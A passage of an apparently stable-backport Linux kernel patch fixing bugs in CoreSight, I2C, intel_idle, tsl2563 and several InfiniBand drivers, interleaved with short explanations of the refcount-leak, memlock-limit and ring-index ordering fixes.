+--- a/drivers/hwtracing/coresight/coresight-cti-sysfs.c
++++ b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+@@ -108,10 +108,19 @@ static ssize_t enable_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (val)
++	if (val) {
++		ret = pm_runtime_resume_and_get(dev->parent);
++		if (ret)
++			return ret;
+ 		ret = cti_enable(drvdata->csdev);
+-	else
++		if (ret)
++			pm_runtime_put(dev->parent);
++	} else {
+ 		ret = cti_disable(drvdata->csdev);
++		if (!ret)
++			pm_runtime_put(dev->parent);
++	}
++
+ 	if (ret)
+ 		return ret;
+ 	return size;
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 80fefaba58eeb..c7a65d1524fcb 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -424,8 +424,10 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, config->vipcssctlr, TRCVIPCSSCTLR);
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, config->seq_ctrl[i], TRCSEQEVRn(i));
+-	etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, config->ext_inp, TRCEXTINSELR);
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+ 		etm4x_relaxed_write32(csa, config->cntrldvr[i], TRCCNTRLDVRn(i));
+@@ -1631,8 +1633,10 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+ 
+-	state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
+-	state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
++		state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	}
+ 	state->trcextinselr = etm4x_read32(csa, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+@@ -1760,8 +1764,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+ 
+-	etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, state->trcextinselr, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 5d5526aa60c40..30f1525639b57 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -356,8 +356,18 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 
+ static int hisi_ptt_init_filters(struct pci_dev *pdev, void *data)
+ {
++	struct pci_dev *root_port = pcie_find_root_port(pdev);
+ 	struct hisi_ptt_filter_desc *filter;
+ 	struct hisi_ptt *hisi_ptt = data;
++	u32 port_devid;
++
++	if (!root_port)
++		return 0;
++
++	port_devid = PCI_DEVID(root_port->bus->number, root_port->devfn);
++	if (port_devid < hisi_ptt->lower_bdf ||
++	    port_devid > hisi_ptt->upper_bdf)
++		return 0;
+ 
+ 	/*
+ 	 * We won't fail the probe if filter allocation failed here. The filters
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index bceaf70f4e237..6fdb25a5f8016 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -465,7 +465,7 @@ void __i2c_dw_disable(struct dw_i2c_dev *dev)
+ 	dev_warn(dev->dev, "timeout in disabling adapter\n");
+ }
+ 
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev)
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev)
+ {
+ 	/*
+ 	 * Clock is not necessary if we got LCNT/HCNT values directly from
+diff --git a/drivers/i2c/busses/i2c-designware-core.h b/drivers/i2c/busses/i2c-designware-core.h
+index 4d3a3b464ecd8..56a029da448a7 100644
+--- a/drivers/i2c/busses/i2c-designware-core.h
++++ b/drivers/i2c/busses/i2c-designware-core.h
+@@ -322,7 +322,7 @@ int i2c_dw_init_regmap(struct dw_i2c_dev *dev);
+ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset);
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset);
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev);
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev);
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev);
+ int i2c_dw_prepare_clk(struct dw_i2c_dev *dev, bool prepare);
+ int i2c_dw_acquire_lock(struct dw_i2c_dev *dev);
+ void i2c_dw_release_lock(struct dw_i2c_dev *dev);
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..f060ac7376e69 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,13 +168,7 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-
+-	/*
+-	 * The lockdep hardirqs state may be changed to 'on' with timer
+-	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
+-	 * to keep the hardirqs state correct.
+-	 */
+-	local_irq_disable();
++	raw_local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iio/light/tsl2563.c b/drivers/iio/light/tsl2563.c
+index 951f35ef3f41d..47a4626e94610 100644
+--- a/drivers/iio/light/tsl2563.c
++++ b/drivers/iio/light/tsl2563.c
+@@ -705,6 +705,7 @@ static int tsl2563_probe(struct i2c_client *client,
+ 	struct iio_dev *indio_dev;
+ 	struct tsl2563_chip *chip;
+ 	struct tsl2563_platform_data *pdata = client->dev.platform_data;
++	unsigned long irq_flags;
+ 	int err = 0;
+ 	u8 id = 0;
+ 
+@@ -760,10 +761,15 @@ static int tsl2563_probe(struct i2c_client *client,
+ 		indio_dev->info = &tsl2563_info_no_irq;
+ 
+ 	if (client->irq) {
++		irq_flags = irq_get_trigger_type(client->irq);
++		if (irq_flags == IRQF_TRIGGER_NONE)
++			irq_flags = IRQF_TRIGGER_RISING;
++		irq_flags |= IRQF_ONESHOT;
++
+ 		err = devm_request_threaded_irq(&client->dev, client->irq,
+ 					   NULL,
+ 					   &tsl2563_event_handler,
+-					   IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					   irq_flags,
+ 					   "tsl2563_event",
+ 					   indio_dev);
+ 		if (err) {
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index 499a425a33791..ced615b5ea096 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -2676,6 +2676,9 @@ static int pass_establish(struct c4iw_dev *dev, struct sk_buff *skb)
+ 	u16 tcp_opt = ntohs(req->tcp_opt);
+ 
+ 	ep = get_ep_from_tid(dev, tid);
++	if (!ep)
++		return 0;
++
+ 	pr_debug("ep %p tid %u\n", ep, ep->hwtid);
+ 	ep->snd_seq = be32_to_cpu(req->snd_isn);
+ 	ep->rcv_seq = be32_to_cpu(req->rcv_isn);
+@@ -4144,6 +4147,10 @@ static int rx_pkt(struct c4iw_dev *dev, struct sk_buff *skb)
+ 
+ 	if (neigh->dev->flags & IFF_LOOPBACK) {
+ 		pdev = ip_dev_find(&init_net, iph->daddr);
++		if (!pdev) {
++			pr_err("%s - failed to find device!\n", __func__);
++			goto free_dst;
++		}
+ 		e = cxgb4_l2t_get(dev->rdev.lldi.l2t, neigh,
+ 				    pdev, 0);
+ 		pi = (struct port_info *)netdev_priv(pdev);
+diff --git a/drivers/infiniband/hw/cxgb4/restrack.c b/drivers/infiniband/hw/cxgb4/restrack.c
+index ff645b955a082..fd22c85d35f4f 100644
+--- a/drivers/infiniband/hw/cxgb4/restrack.c
++++ b/drivers/infiniband/hw/cxgb4/restrack.c
+@@ -238,7 +238,7 @@ int c4iw_fill_res_cm_id_entry(struct sk_buff *msg,
+ 	if (rdma_nl_put_driver_u64_hex(msg, "history", epcp->history))
+ 		goto err_cancel_table;
+ 
+-	if (epcp->state == LISTEN) {
++	if (listen_ep) {
+ 		if (rdma_nl_put_driver_u32(msg, "stid", listen_ep->stid))
+ 			goto err_cancel_table;
+ 		if (rdma_nl_put_driver_u32(msg, "backlog", listen_ep->backlog))
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 62be98e2b9414..19c69ea1b0c0f 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -1089,12 +1089,14 @@ int erdma_mmap(struct ib_ucontext *ctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err = -EINVAL;
++		goto put_entry;
+ 	}
+ 
+ 	err = rdma_user_mmap_io(ctx, vma, PFN_DOWN(entry->address), PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++put_entry:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+ 	return err;
+ }
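The erdma hunk above (and the matching hns_roce hunk further down) fixes a reference leak: rdma_user_mmap_entry_put() has to run on every exit path, so the early return in the default case becomes a goto to a common put. A runnable toy model of the pattern, with get_ref()/put_ref() standing in for the entry reference counting:

#include <stdio.h>

static int refs;
static void get_ref(void) { refs++; }
static void put_ref(void) { refs--; }

static int do_mmap(int type)
{
	int err = 0;

	get_ref();			/* the lookup takes a reference */
	switch (type) {
	case 0:
	case 1:
		/* ... set up prot and map the region ... */
		break;
	default:
		err = -22;		/* -EINVAL */
		goto put_entry;		/* was: return -EINVAL, leaking a ref */
	}

put_entry:
	put_ref();			/* now balanced on every path */
	return err;
}

int main(void)
{
	do_mmap(7);
	printf("refs after invalid type: %d\n", refs);	/* prints 0 */
	return 0;
}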
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index a95b654f52540..8ed20392e9f0d 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3160,8 +3160,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	tx->num_desc++;
+-	if ((unlikely(tx->num_desc == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+@@ -3174,6 +3173,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 		SDMA_MAP_NONE,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index d8170fcbfbdd5..b023fc461bd51 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -631,14 +631,13 @@ static inline void sdma_txclean(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ 				  struct sdma_txreq *tx)
+ {
+-	tx->descp[tx->num_desc].qw[0] |=
+-		SDMA_DESC0_LAST_DESC_FLAG;
+-	tx->descp[tx->num_desc].qw[1] |=
+-		dd->default_desc1;
++	u16 last_desc = tx->num_desc - 1;
++
++	tx->descp[last_desc].qw[0] |= SDMA_DESC0_LAST_DESC_FLAG;
++	tx->descp[last_desc].qw[1] |= dd->default_desc1;
+ 	if (tx->flags & SDMA_TXREQ_F_URGENT)
+-		tx->descp[tx->num_desc].qw[1] |=
+-			(SDMA_DESC1_HEAD_TO_HOST_FLAG |
+-			 SDMA_DESC1_INT_REQ_FLAG);
++		tx->descp[last_desc].qw[1] |= (SDMA_DESC1_HEAD_TO_HOST_FLAG |
++					       SDMA_DESC1_INT_REQ_FLAG);
+ }
+ 
+ static inline int _sdma_txadd_daddr(
+@@ -655,6 +654,7 @@ static inline int _sdma_txadd_daddr(
+ 		type,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
++	tx->num_desc++;
+ 	tx->tlen -= len;
+ 	/* special cases for last */
+ 	if (!tx->tlen) {
+@@ -666,7 +666,6 @@ static inline int _sdma_txadd_daddr(
+ 			_sdma_close_tx(dd, tx);
+ 		}
+ 	}
+-	tx->num_desc++;
+ 	return rval;
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/user_pages.c b/drivers/infiniband/hw/hfi1/user_pages.c
+index 7bce963e2ae69..36aaedc651456 100644
+--- a/drivers/infiniband/hw/hfi1/user_pages.c
++++ b/drivers/infiniband/hw/hfi1/user_pages.c
+@@ -29,33 +29,52 @@ MODULE_PARM_DESC(cache_size, "Send and receive side cache size limit (in MB)");
+ bool hfi1_can_pin_pages(struct hfi1_devdata *dd, struct mm_struct *mm,
+ 			u32 nlocked, u32 npages)
+ {
+-	unsigned long ulimit = rlimit(RLIMIT_MEMLOCK), pinned, cache_limit,
+-		size = (cache_size * (1UL << 20)); /* convert to bytes */
+-	unsigned int usr_ctxts =
+-			dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
+-	bool can_lock = capable(CAP_IPC_LOCK);
++	unsigned long ulimit_pages;
++	unsigned long cache_limit_pages;
++	unsigned int usr_ctxts;
+ 
+ 	/*
+-	 * Calculate per-cache size. The calculation below uses only a quarter
+-	 * of the available per-context limit. This leaves space for other
+-	 * pinning. Should we worry about shared ctxts?
++	 * Perform RLIMIT_MEMLOCK based checks unless CAP_IPC_LOCK is present.
+ 	 */
+-	cache_limit = (ulimit / usr_ctxts) / 4;
+-
+-	/* If ulimit isn't set to "unlimited" and is smaller than cache_size. */
+-	if (ulimit != (-1UL) && size > cache_limit)
+-		size = cache_limit;
+-
+-	/* Convert to number of pages */
+-	size = DIV_ROUND_UP(size, PAGE_SIZE);
+-
+-	pinned = atomic64_read(&mm->pinned_vm);
++	if (!capable(CAP_IPC_LOCK)) {
++		ulimit_pages =
++			DIV_ROUND_DOWN_ULL(rlimit(RLIMIT_MEMLOCK), PAGE_SIZE);
++
++		/*
++		 * Pinning these pages would exceed this process's locked memory
++		 * limit.
++		 */
++		if (atomic64_read(&mm->pinned_vm) + npages > ulimit_pages)
++			return false;
++
++		/*
++		 * Only allow 1/4 of the user's RLIMIT_MEMLOCK to be used for HFI
++		 * caches.  This fraction is then equally distributed among all
++		 * existing user contexts.  Note that if RLIMIT_MEMLOCK is
++		 * 'unlimited' (-1), the value of this limit will be > 2^42 pages
++		 * (2^64 / 2^12 / 2^8 / 2^2).
++		 *
++		 * The effectiveness of this check may be reduced if I/O occurs on
++		 * some user contexts before all user contexts are created.  This
++		 * check assumes that this process is the only one using this
++		 * context (e.g., the corresponding fd was not passed to another
++		 * process for concurrent access) as there is no per-context,
++		 * per-process tracking of pinned pages.  It also assumes that each
++		 * user context has only one cache to limit.
++		 */
++		usr_ctxts = dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
++		if (nlocked + npages > (ulimit_pages / usr_ctxts / 4))
++			return false;
++	}
+ 
+-	/* First, check the absolute limit against all pinned pages. */
+-	if (pinned + npages >= ulimit && !can_lock)
++	/*
++	 * Pinning these pages would exceed the size limit for this cache.
++	 */
++	cache_limit_pages = cache_size * (1024 * 1024) / PAGE_SIZE;
++	if (nlocked + npages > cache_limit_pages)
+ 		return false;
+ 
+-	return ((nlocked + npages) <= size) || can_lock;
++	return true;
+ }
+ 
+ int hfi1_acquire_user_pages(struct mm_struct *mm, unsigned long vaddr, size_t npages,
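The rewritten hfi1_can_pin_pages() works entirely in pages and separates three concerns: the absolute RLIMIT_MEMLOCK ceiling (skipped when the caller has CAP_IPC_LOCK), a per-context share of a quarter of that limit, and the cache's own size cap, which now binds even for privileged callers. A hedged userspace restatement of the math; every name below is a stand-in for the driver state, not the real interface:

#include <stdbool.h>
#include <stdint.h>

#define PAGE_SIZE 4096ULL

static bool can_pin(bool cap_ipc_lock, uint64_t ulimit_bytes,
		    uint64_t pinned, uint32_t usr_ctxts,
		    uint64_t nlocked, uint64_t npages, uint64_t cache_mb)
{
	if (!cap_ipc_lock) {
		uint64_t ulimit_pages = ulimit_bytes / PAGE_SIZE;

		/* absolute per-process locked-memory limit */
		if (pinned + npages > ulimit_pages)
			return false;
		/* 1/4 of the limit, split evenly across user contexts */
		if (nlocked + npages > ulimit_pages / usr_ctxts / 4)
			return false;
	}
	/* the cache's own size cap applies regardless of privilege */
	return nlocked + npages <= cache_mb * 1024 * 1024 / PAGE_SIZE;
}

int main(void)
{
	/* unprivileged, 64 MiB RLIMIT_MEMLOCK, 4 contexts, 16 MiB cache */
	return can_pin(false, 64ULL << 20, 0, 4, 0, 1000, 16) ? 0 : 1;
}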
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 8ba68ac12388d..946ba1109e878 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -443,14 +443,15 @@ static int hns_roce_mmap(struct ib_ucontext *uctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	ret = rdma_user_mmap_io(uctx, vma, pfn, rdma_entry->npages * PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++out:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index ab246447520bd..2e1e2bad04011 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -483,6 +483,8 @@ static int irdma_save_msix_info(struct irdma_pci_f *rf)
+ 	iw_qvlist->num_vectors = rf->msix_count;
+ 	if (rf->msix_count <= num_online_cpus())
+ 		rf->msix_shared = true;
++	else if (rf->msix_count > num_online_cpus() + 1)
++		rf->msix_count = num_online_cpus() + 1;
+ 
+ 	pmsix = rf->msix_entries;
+ 	for (i = 0, ceq_idx = 0; i < rf->msix_count; i++, iw_qvinfo++) {
+diff --git a/drivers/infiniband/sw/rxe/rxe_queue.h b/drivers/infiniband/sw/rxe/rxe_queue.h
+index ed44042782fa7..c711cb98b9496 100644
+--- a/drivers/infiniband/sw/rxe/rxe_queue.h
++++ b/drivers/infiniband/sw/rxe/rxe_queue.h
+@@ -35,19 +35,26 @@
+ /**
+  * enum queue_type - type of queue
+  * @QUEUE_TYPE_TO_CLIENT:	Queue is written by rxe driver and
+- *				read by client. Used by rxe driver only.
++ *				read by client which may be a user space
++ *				application or a kernel ulp.
++ *				Used by rxe internals only.
+  * @QUEUE_TYPE_FROM_CLIENT:	Queue is written by client and
+- *				read by rxe driver. Used by rxe driver only.
+- * @QUEUE_TYPE_TO_DRIVER:	Queue is written by client and
+- *				read by rxe driver. Used by kernel client only.
+- * @QUEUE_TYPE_FROM_DRIVER:	Queue is written by rxe driver and
+- *				read by client. Used by kernel client only.
++ *				read by rxe driver.
++ *				Used by rxe internals only.
++ * @QUEUE_TYPE_FROM_ULP:	Queue is written by kernel ulp and
++ *				read by rxe driver.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
++ * @QUEUE_TYPE_TO_ULP:		Queue is written by rxe driver and
++ *				read by kernel ulp.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
+  */
+ enum queue_type {
+ 	QUEUE_TYPE_TO_CLIENT,
+ 	QUEUE_TYPE_FROM_CLIENT,
+-	QUEUE_TYPE_TO_DRIVER,
+-	QUEUE_TYPE_FROM_DRIVER,
++	QUEUE_TYPE_FROM_ULP,
++	QUEUE_TYPE_TO_ULP,
+ };
+ 
+ struct rxe_queue_buf;
+@@ -62,9 +69,9 @@ struct rxe_queue {
+ 	u32			index_mask;
+ 	enum queue_type		type;
+ 	/* private copy of index for shared queues between
+-	 * kernel space and user space. Kernel reads and writes
++	 * driver and clients. Driver reads and writes
+ 	 * this copy and then replicates to rxe_queue_buf
+-	 * for read access by user space.
++	 * for read access by clients.
+ 	 */
+ 	u32			index;
+ };
+@@ -97,19 +104,21 @@ static inline u32 queue_get_producer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		prod = smp_load_acquire(&q->buf->producer_index);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		/* protect driver index */
+-		prod = smp_load_acquire(&q->buf->producer_index);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		prod = smp_load_acquire(&q->buf->producer_index);
++		break;
+ 	}
+ 
+ 	return prod;
+@@ -122,19 +131,21 @@ static inline u32 queue_get_consumer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
++		/* used by rxe which owns the index */
+ 		cons = q->index;
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		cons = q->buf->consumer_index;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		/* protect driver index */
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
++		cons = q->buf->consumer_index;
++		break;
+ 	}
+ 
+ 	return cons;
+@@ -172,24 +183,31 @@ static inline void queue_advance_producer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		prod = (prod + 1) & q->index_mask;
+ 		q->index = prod;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->producer_index, prod);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		prod = (prod + 1) & q->index_mask;
+-		q->buf->producer_index = prod;
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->producer_index, prod);
++		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+ 	}
+ }
+@@ -201,24 +219,30 @@ static inline void queue_advance_consumer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		cons = q->index;
+-		cons = (cons + 1) & q->index_mask;
++		/* used by rxe which owns the index */
++		cons = (q->index + 1) & q->index_mask;
+ 		q->index = cons;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
++		break;
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
+ 		cons = q->buf->consumer_index;
+ 		cons = (cons + 1) & q->index_mask;
+-		q->buf->consumer_index = cons;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	}
+ }
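Behind the FROM_ULP/TO_ULP renaming, the queue rework enforces a single ownership rule: each ring index has exactly one writer; the side that does not own an index loads it with smp_load_acquire(), and the owner publishes updates with smp_store_release(), so a slot's contents are visible before the index that exposes it. The same discipline in a minimal C11 single-producer/single-consumer ring; this is a sketch of the memory-ordering idea, not the rxe queue layout:

#include <stdatomic.h>
#include <stdbool.h>

#define RING_SIZE 64				/* power of two */

struct ring {
	_Atomic unsigned int producer;		/* written only by the producer */
	_Atomic unsigned int consumer;		/* written only by the consumer */
	void *slot[RING_SIZE];
};

static bool ring_push(struct ring *q, void *item)
{
	unsigned int prod = atomic_load_explicit(&q->producer,
						 memory_order_relaxed);
	/* peer-owned index: acquire pairs with the consumer's release */
	unsigned int cons = atomic_load_explicit(&q->consumer,
						 memory_order_acquire);

	if (prod - cons == RING_SIZE)
		return false;			/* full */
	q->slot[prod % RING_SIZE] = item;
	/* publish the slot before the new index becomes visible */
	atomic_store_explicit(&q->producer, prod + 1, memory_order_release);
	return true;
}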
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 88825edc7dce1..be13bcb4cc406 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -238,29 +238,24 @@ static int rxe_destroy_ah(struct ib_ah *ibah, u32 flags)
+ 
+ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ {
+-	int err;
+ 	int i;
+ 	u32 length;
+ 	struct rxe_recv_wqe *recv_wqe;
+ 	int num_sge = ibwr->num_sge;
+ 	int full;
+ 
+-	full = queue_full(rq->queue, QUEUE_TYPE_TO_DRIVER);
+-	if (unlikely(full)) {
+-		err = -ENOMEM;
+-		goto err1;
+-	}
++	full = queue_full(rq->queue, QUEUE_TYPE_FROM_ULP);
++	if (unlikely(full))
++		return -ENOMEM;
+ 
+-	if (unlikely(num_sge > rq->max_sge)) {
+-		err = -EINVAL;
+-		goto err1;
+-	}
++	if (unlikely(num_sge > rq->max_sge))
++		return -EINVAL;
+ 
+ 	length = 0;
+ 	for (i = 0; i < num_sge; i++)
+ 		length += ibwr->sg_list[i].length;
+ 
+-	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	recv_wqe->wr_id = ibwr->wr_id;
+ 
+ 	memcpy(recv_wqe->dma.sge, ibwr->sg_list,
+@@ -272,12 +267,9 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	recv_wqe->dma.cur_sge		= 0;
+ 	recv_wqe->dma.sge_offset	= 0;
+ 
+-	queue_advance_producer(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	return 0;
+-
+-err1:
+-	return err;
+ }
+ 
+ static int rxe_create_srq(struct ib_srq *ibsrq, struct ib_srq_init_attr *init,
+@@ -343,10 +335,7 @@ static int rxe_modify_srq(struct ib_srq *ibsrq, struct ib_srq_attr *attr,
+ 	if (err)
+ 		return err;
+ 
+-	err = rxe_srq_from_attr(rxe, srq, attr, mask, &ucmd, udata);
+-	if (err)
+-		return err;
+-	return 0;
